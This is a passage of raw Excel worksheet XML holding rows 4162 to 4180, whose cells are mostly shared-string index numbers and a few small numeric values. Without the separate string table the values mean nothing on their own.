        <v>28347</v>
      </c>
      <c r="G4162" s="12" t="s">
        <v>26738</v>
      </c>
      <c r="H4162" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4162" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4162" s="12" t="s">
        <v>21511</v>
      </c>
      <c r="K4162" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4162" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4162" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4162" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4162" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4162" s="12" t="s">
        <v>26739</v>
      </c>
      <c r="Q4162" s="16">
        <v>3.1</v>
      </c>
      <c r="R4162" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4162" s="12" t="s">
        <v>26740</v>
      </c>
      <c r="T4162" s="12" t="s">
        <v>26563</v>
      </c>
      <c r="U4162" s="12" t="s">
        <v>26564</v>
      </c>
      <c r="V4162" s="12" t="s">
        <v>26565</v>
      </c>
      <c r="W4162" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4162" s="12">
        <v>3</v>
      </c>
      <c r="Y4162" s="12" t="s">
        <v>26741</v>
      </c>
    </row>
    <row r="4163" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4163" s="12">
        <v>60514</v>
      </c>
      <c r="B4163" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4163" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4163" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F4163" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4163" s="12" t="s">
        <v>26742</v>
      </c>
      <c r="H4163" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4163" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4163" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4163" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4163" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4163" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4163" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4163" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4163" s="12" t="s">
        <v>26743</v>
      </c>
      <c r="Q4163" s="16">
        <v>3.1</v>
      </c>
      <c r="R4163" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4163" s="12" t="s">
        <v>26744</v>
      </c>
      <c r="T4163" s="12" t="s">
        <v>10097</v>
      </c>
      <c r="U4163" s="12" t="s">
        <v>26745</v>
      </c>
      <c r="V4163" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W4163" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4163" s="12">
        <v>1</v>
      </c>
      <c r="Y4163" s="12" t="s">
        <v>26746</v>
      </c>
    </row>
    <row r="4164" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4164" s="12">
        <v>60519</v>
      </c>
      <c r="B4164" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4164" s="12" t="s">
        <v>30442</v>
      </c>
      <c r="E4164" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4164" s="12" t="s">
        <v>30443</v>
      </c>
      <c r="G4164" s="12" t="s">
        <v>26747</v>
      </c>
      <c r="H4164" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4164" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4164" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K4164" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4164" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4164" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4164" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4164" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4164" s="12" t="s">
        <v>26748</v>
      </c>
      <c r="Q4164" s="12" t="s">
        <v>28321</v>
      </c>
      <c r="R4164" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4164" s="12" t="s">
        <v>26749</v>
      </c>
      <c r="T4164" s="12" t="s">
        <v>26750</v>
      </c>
      <c r="U4164" s="12" t="s">
        <v>26751</v>
      </c>
      <c r="V4164" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4164" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4164" s="12">
        <v>13</v>
      </c>
      <c r="Y4164" s="12" t="s">
        <v>26752</v>
      </c>
    </row>
    <row r="4165" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4165" s="12">
        <v>60552</v>
      </c>
      <c r="B4165" s="12" t="s">
        <v>30515</v>
      </c>
      <c r="C4165" s="12" t="s">
        <v>30561</v>
      </c>
      <c r="D4165" s="12" t="s">
        <v>30538</v>
      </c>
      <c r="F4165" s="12" t="s">
        <v>30562</v>
      </c>
      <c r="G4165" s="12" t="s">
        <v>26753</v>
      </c>
      <c r="H4165" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4165" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4165" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K4165" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4165" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4165" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4165" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4165" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4165" s="12" t="s">
        <v>26754</v>
      </c>
      <c r="Q4165" s="16">
        <v>3.1</v>
      </c>
      <c r="R4165" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4165" s="12" t="s">
        <v>26755</v>
      </c>
      <c r="T4165" s="12" t="s">
        <v>26756</v>
      </c>
      <c r="U4165" s="12" t="s">
        <v>26757</v>
      </c>
      <c r="V4165" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W4165" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4165" s="12">
        <v>3</v>
      </c>
      <c r="Y4165" s="12" t="s">
        <v>26758</v>
      </c>
    </row>
    <row r="4166" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4166" s="12">
        <v>60561</v>
      </c>
      <c r="B4166" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4166" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4166" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4166" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4166" s="12" t="s">
        <v>26759</v>
      </c>
      <c r="H4166" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4166" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4166" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4166" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4166" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4166" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4166" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4166" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4166" s="12" t="s">
        <v>26760</v>
      </c>
      <c r="Q4166" s="12">
        <v>3.8</v>
      </c>
      <c r="R4166" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4166" s="12" t="s">
        <v>26761</v>
      </c>
      <c r="T4166" s="12" t="s">
        <v>25544</v>
      </c>
      <c r="U4166" s="12" t="s">
        <v>26762</v>
      </c>
      <c r="V4166" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4166" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4166" s="12">
        <v>35</v>
      </c>
      <c r="Y4166" s="12" t="s">
        <v>26763</v>
      </c>
    </row>
    <row r="4167" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4167" s="12">
        <v>60573</v>
      </c>
      <c r="B4167" s="12" t="s">
        <v>30284</v>
      </c>
      <c r="D4167" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4167" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4167" s="12" t="s">
        <v>26764</v>
      </c>
      <c r="H4167" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4167" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4167" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K4167" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4167" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4167" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4167" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4167" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4167" s="12">
        <v>3.9</v>
      </c>
      <c r="Q4167" s="12">
        <v>3.9</v>
      </c>
      <c r="R4167" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4167" s="12" t="s">
        <v>26765</v>
      </c>
      <c r="T4167" s="12" t="s">
        <v>26766</v>
      </c>
      <c r="U4167" s="12" t="s">
        <v>26767</v>
      </c>
      <c r="V4167" s="12" t="s">
        <v>8133</v>
      </c>
      <c r="W4167" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4167" s="12">
        <v>6</v>
      </c>
      <c r="Y4167" s="12" t="s">
        <v>26768</v>
      </c>
    </row>
    <row r="4168" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4168" s="12">
        <v>60583</v>
      </c>
      <c r="B4168" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4168" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D4168" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4168" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4168" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4168" s="12" t="s">
        <v>26774</v>
      </c>
      <c r="H4168" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4168" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4168" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4168" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L4168" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4168" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4168" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4168" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4168" s="12" t="s">
        <v>26775</v>
      </c>
      <c r="Q4168" s="17">
        <v>3.5</v>
      </c>
      <c r="R4168" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4168" s="12" t="s">
        <v>26776</v>
      </c>
      <c r="T4168" s="12" t="s">
        <v>26777</v>
      </c>
      <c r="U4168" s="12" t="s">
        <v>26778</v>
      </c>
      <c r="V4168" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4168" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4168" s="12">
        <v>19</v>
      </c>
      <c r="Y4168" s="12" t="s">
        <v>26779</v>
      </c>
    </row>
    <row r="4169" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4169" s="12">
        <v>60596</v>
      </c>
      <c r="B4169" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4169" s="12" t="s">
        <v>31163</v>
      </c>
      <c r="E4169" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4169" s="12" t="s">
        <v>31145</v>
      </c>
      <c r="G4169" s="12" t="s">
        <v>26780</v>
      </c>
      <c r="H4169" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4169" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J4169" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K4169" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4169" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4169" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4169" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4169" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4169" s="12" t="s">
        <v>26334</v>
      </c>
      <c r="Q4169" s="12">
        <v>3.8</v>
      </c>
      <c r="R4169" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4169" s="12" t="s">
        <v>26781</v>
      </c>
      <c r="T4169" s="12" t="s">
        <v>26782</v>
      </c>
      <c r="U4169" s="12" t="s">
        <v>26783</v>
      </c>
      <c r="V4169" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W4169" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4169" s="12">
        <v>1</v>
      </c>
      <c r="Y4169" s="12" t="s">
        <v>26784</v>
      </c>
    </row>
    <row r="4170" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4170" s="12">
        <v>60612</v>
      </c>
      <c r="B4170" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4170" s="12" t="s">
        <v>30407</v>
      </c>
      <c r="D4170" s="12" t="s">
        <v>30411</v>
      </c>
      <c r="F4170" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4170" s="12" t="s">
        <v>26785</v>
      </c>
      <c r="H4170" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4170" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4170" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4170" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4170" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M4170" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N4170" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O4170" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4170" s="12" t="s">
        <v>26786</v>
      </c>
      <c r="Q4170" s="16">
        <v>3.1</v>
      </c>
      <c r="R4170" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4170" s="12" t="s">
        <v>26787</v>
      </c>
      <c r="T4170" s="12" t="s">
        <v>26788</v>
      </c>
      <c r="U4170" s="12" t="s">
        <v>26789</v>
      </c>
      <c r="V4170" s="12" t="s">
        <v>16681</v>
      </c>
      <c r="W4170" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4170" s="12">
        <v>20</v>
      </c>
      <c r="Y4170" s="12" t="s">
        <v>26790</v>
      </c>
    </row>
    <row r="4171" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4171" s="12">
        <v>60628</v>
      </c>
      <c r="B4171" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4171" s="12" t="s">
        <v>29857</v>
      </c>
      <c r="D4171" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4171" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4171" s="12" t="s">
        <v>26791</v>
      </c>
      <c r="H4171" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4171" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4171" s="12" t="s">
        <v>9893</v>
      </c>
      <c r="K4171" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4171" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4171" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4171" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4171" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4171" s="12" t="s">
        <v>26792</v>
      </c>
      <c r="Q4171" s="12">
        <v>3.11</v>
      </c>
      <c r="R4171" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4171" s="12" t="s">
        <v>26793</v>
      </c>
      <c r="T4171" s="12" t="s">
        <v>10097</v>
      </c>
      <c r="U4171" s="12" t="s">
        <v>26794</v>
      </c>
      <c r="V4171" s="12" t="s">
        <v>9896</v>
      </c>
      <c r="W4171" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4171" s="12">
        <v>4</v>
      </c>
      <c r="Y4171" s="12" t="s">
        <v>26795</v>
      </c>
    </row>
    <row r="4172" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4172" s="12">
        <v>60650</v>
      </c>
      <c r="B4172" s="12" t="s">
        <v>30604</v>
      </c>
      <c r="C4172" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D4172" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4172" s="12" t="s">
        <v>31437</v>
      </c>
      <c r="F4172" s="12" t="s">
        <v>30576</v>
      </c>
      <c r="G4172" s="12" t="s">
        <v>26796</v>
      </c>
      <c r="H4172" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4172" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4172" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K4172" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4172" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4172" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4172" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4172" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4172" s="12" t="s">
        <v>26792</v>
      </c>
      <c r="Q4172" s="12">
        <v>3.11</v>
      </c>
      <c r="R4172" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4172" s="12" t="s">
        <v>26797</v>
      </c>
      <c r="T4172" s="12" t="s">
        <v>10097</v>
      </c>
      <c r="U4172" s="12" t="s">
        <v>26798</v>
      </c>
      <c r="V4172" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W4172" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4172" s="12">
        <v>1</v>
      </c>
      <c r="Y4172" s="12" t="s">
        <v>26799</v>
      </c>
    </row>
    <row r="4173" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4173" s="12">
        <v>60653</v>
      </c>
      <c r="B4173" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D4173" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4173" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4173" s="12" t="s">
        <v>26800</v>
      </c>
      <c r="H4173" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4173" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4173" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K4173" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4173" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4173" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4173" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4173" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4173" s="12" t="s">
        <v>26801</v>
      </c>
      <c r="Q4173" s="12">
        <v>3.11</v>
      </c>
      <c r="R4173" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4173" s="12" t="s">
        <v>26802</v>
      </c>
      <c r="T4173" s="12" t="s">
        <v>26803</v>
      </c>
      <c r="U4173" s="12" t="s">
        <v>26804</v>
      </c>
      <c r="V4173" s="12" t="s">
        <v>26805</v>
      </c>
      <c r="W4173" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4173" s="12">
        <v>3</v>
      </c>
      <c r="Y4173" s="12" t="s">
        <v>26806</v>
      </c>
    </row>
    <row r="4174" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4174" s="12">
        <v>60677</v>
      </c>
      <c r="B4174" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4174" s="12" t="s">
        <v>30906</v>
      </c>
      <c r="E4174" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4174" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4174" s="12" t="s">
        <v>26807</v>
      </c>
      <c r="H4174" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4174" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4174" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4174" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4174" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4174" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4174" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4174" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4174" s="12" t="s">
        <v>26808</v>
      </c>
      <c r="Q4174" s="12">
        <v>3.11</v>
      </c>
      <c r="R4174" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4174" s="12" t="s">
        <v>26809</v>
      </c>
      <c r="T4174" s="12" t="s">
        <v>26810</v>
      </c>
      <c r="U4174" s="12" t="s">
        <v>26811</v>
      </c>
      <c r="V4174" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4174" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4174" s="12">
        <v>19</v>
      </c>
      <c r="Y4174" s="12" t="s">
        <v>26812</v>
      </c>
    </row>
    <row r="4175" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4175" s="12">
        <v>60679</v>
      </c>
      <c r="B4175" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4175" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4175" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F4175" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4175" s="12" t="s">
        <v>26813</v>
      </c>
      <c r="H4175" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4175" s="12" t="s">
        <v>14196</v>
      </c>
      <c r="J4175" s="12" t="s">
        <v>14197</v>
      </c>
      <c r="K4175" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4175" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4175" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4175" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4175" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4175" s="12" t="s">
        <v>26814</v>
      </c>
      <c r="Q4175" s="12">
        <v>3.11</v>
      </c>
      <c r="R4175" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4175" s="12" t="s">
        <v>26815</v>
      </c>
      <c r="T4175" s="12" t="s">
        <v>25485</v>
      </c>
      <c r="U4175" s="12" t="s">
        <v>26816</v>
      </c>
      <c r="V4175" s="12" t="s">
        <v>14432</v>
      </c>
      <c r="W4175" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4175" s="12">
        <v>1</v>
      </c>
      <c r="Y4175" s="12" t="s">
        <v>26817</v>
      </c>
    </row>
    <row r="4176" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4176" s="12">
        <v>60690</v>
      </c>
      <c r="B4176" s="12" t="s">
        <v>30187</v>
      </c>
      <c r="D4176" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4176" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4176" s="12" t="s">
        <v>26818</v>
      </c>
      <c r="H4176" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4176" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4176" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4176" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4176" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M4176" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N4176" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O4176" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4176" s="12" t="s">
        <v>26819</v>
      </c>
      <c r="Q4176" s="12">
        <v>3.11</v>
      </c>
      <c r="R4176" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4176" s="12" t="s">
        <v>26820</v>
      </c>
      <c r="T4176" s="12" t="s">
        <v>22397</v>
      </c>
      <c r="U4176" s="12" t="s">
        <v>26821</v>
      </c>
      <c r="V4176" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W4176" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4176" s="12">
        <v>5</v>
      </c>
      <c r="Y4176" s="12" t="s">
        <v>26822</v>
      </c>
    </row>
    <row r="4177" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4177" s="12">
        <v>60747</v>
      </c>
      <c r="B4177" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4177" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4177" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4177" s="12" t="s">
        <v>30457</v>
      </c>
      <c r="G4177" s="12" t="s">
        <v>26838</v>
      </c>
      <c r="H4177" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4177" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4177" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K4177" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4177" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4177" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4177" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4177" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4177" s="12" t="s">
        <v>26839</v>
      </c>
      <c r="Q4177" s="12">
        <v>3.11</v>
      </c>
      <c r="R4177" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4177" s="12" t="s">
        <v>26840</v>
      </c>
      <c r="T4177" s="12" t="s">
        <v>26841</v>
      </c>
      <c r="U4177" s="12" t="s">
        <v>26842</v>
      </c>
      <c r="V4177" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W4177" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4177" s="12">
        <v>10</v>
      </c>
      <c r="Y4177" s="12" t="s">
        <v>26843</v>
      </c>
    </row>
    <row r="4178" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4178" s="12">
        <v>60766</v>
      </c>
      <c r="B4178" s="12" t="s">
        <v>30832</v>
      </c>
      <c r="C4178" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D4178" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4178" s="12" t="s">
        <v>31536</v>
      </c>
      <c r="F4178" s="12" t="s">
        <v>30817</v>
      </c>
      <c r="G4178" s="12" t="s">
        <v>26850</v>
      </c>
      <c r="H4178" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4178" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J4178" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4178" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4178" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4178" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4178" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4178" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4178" s="12" t="s">
        <v>26851</v>
      </c>
      <c r="Q4178" s="16">
        <v>3.1</v>
      </c>
      <c r="R4178" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4178" s="12" t="s">
        <v>26852</v>
      </c>
      <c r="T4178" s="12" t="s">
        <v>26853</v>
      </c>
      <c r="U4178" s="12" t="s">
        <v>26854</v>
      </c>
      <c r="V4178" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W4178" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4178" s="12">
        <v>8</v>
      </c>
      <c r="Y4178" s="12" t="s">
        <v>26855</v>
      </c>
    </row>
    <row r="4179" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4179" s="12">
        <v>60770</v>
      </c>
      <c r="B4179" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C4179" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D4179" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4179" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F4179" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4179" s="12" t="s">
        <v>26856</v>
      </c>
      <c r="H4179" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4179" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4179" s="12" t="s">
        <v>26257</v>
      </c>
      <c r="K4179" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4179" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4179" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4179" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4179" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4179" s="12" t="s">
        <v>26857</v>
      </c>
      <c r="Q4179" s="16">
        <v>3.1</v>
      </c>
      <c r="R4179" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4179" s="12" t="s">
        <v>26858</v>
      </c>
      <c r="T4179" s="12" t="s">
        <v>26859</v>
      </c>
      <c r="U4179" s="12" t="s">
        <v>26860</v>
      </c>
      <c r="V4179" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W4179" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4179" s="12">
        <v>28</v>
      </c>
      <c r="Y4179" s="12" t="s">
        <v>26861</v>
      </c>
    </row>
    <row r="4180" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4180" s="12">
        <v>60774</v>
      </c>
      <c r="B4180" s="12" t="s">
        <v>31137</v>
      </c>
      <c r="D4180" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4180" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4180" s="12" t="s">
        <v>26862</v>
      </c>
      <c r="H4180" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4180" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J4180" s="12" t="s">
        <v>28</v>
      </c>
